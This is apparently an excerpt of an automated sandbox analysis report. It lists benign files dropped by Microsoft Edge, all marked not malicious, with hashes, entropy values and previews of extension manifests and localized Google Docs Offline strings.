                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1671779
                                                                                                                                                                                                                                                                              Entropy (8bit):7.99363219545251
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:24576:FIoRVaGFbFDEUYhR1x28472hSaFMPDqMnLLYxT5T4yUzLy1mfi5olodFsB7l:lvZDQdp4YBomMnvETh4LHy1mfixbsBJ
                                                                                                                                                                                                                                                                              MD5:C46BA1CE49F4BA890755FEC81FC0A0CE
                                                                                                                                                                                                                                                                              SHA1:532E72CE7A275133137FFAADFAE6C2E049D1AECD
                                                                                                                                                                                                                                                                              SHA-256:7B9E0705D836552D15EB5A3F26527A59BE777AE7A81DBEAB0564EFC7DE824FA3
                                                                                                                                                                                                                                                                              SHA-512:3D8538663F9A54B064120B127D85234F1BCDC178B9CBD2BB2ED05A4D9DD55C53D8D3DCBA7DF531D1AF075E5F1CEDD389670B3204EB90C8CA388A38423642A8C9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                                                                              Entropy (8bit):5.405598787615201
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0hG5aF0hv5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5W
                                                                                                                                                                                                                                                                              MD5:3F4227C7AD601FDD5FC1303573D8B44F
                                                                                                                                                                                                                                                                              SHA1:50DEFB703A0070A09108CC2F6173709603C826C7
                                                                                                                                                                                                                                                                              SHA-256:BE8A7138E1C6CFE588219A93F01DA2EB0ACBA7E19D90EF098E0B49BBA777E5F3
                                                                                                                                                                                                                                                                              SHA-512:C23956F126A124CAB5118B265942B7572BE6D3E4E68E009EA4DFD3EBFEE0483D5E9A42EB0C98E8C0A6F0C42112225BEE2FAE2509281D0531CD08FCF54BB1A86B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1753
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                              MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                              SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                              SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                              SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9815
                                                                                                                                                                                                                                                                              Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                              MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                              SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                              SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                              SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10388
                                                                                                                                                                                                                                                                              Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                              MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                              SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                              SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                              SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                                                                                                                              Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                              MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                              SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                              SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                              SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):154477
                                                                                                                                                                                                                                                                              Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                              MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                              SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                              SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                              SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4982
                                                                                                                                                                                                                                                                              Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                              MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):908
                                                                                                                                                                                                                                                                              Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                              MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1285
                                                                                                                                                                                                                                                                              Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                              SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                                                                              Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                              Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                              MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3107
                                                                                                                                                                                                                                                                              Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                              MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1389
                                                                                                                                                                                                                                                                              Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                              MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                                                                              Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                                                                                                                              Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):913
                                                                                                                                                                                                                                                                              Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):806
                                                                                                                                                                                                                                                                              Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):883
                                                                                                                                                                                                                                                                              Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
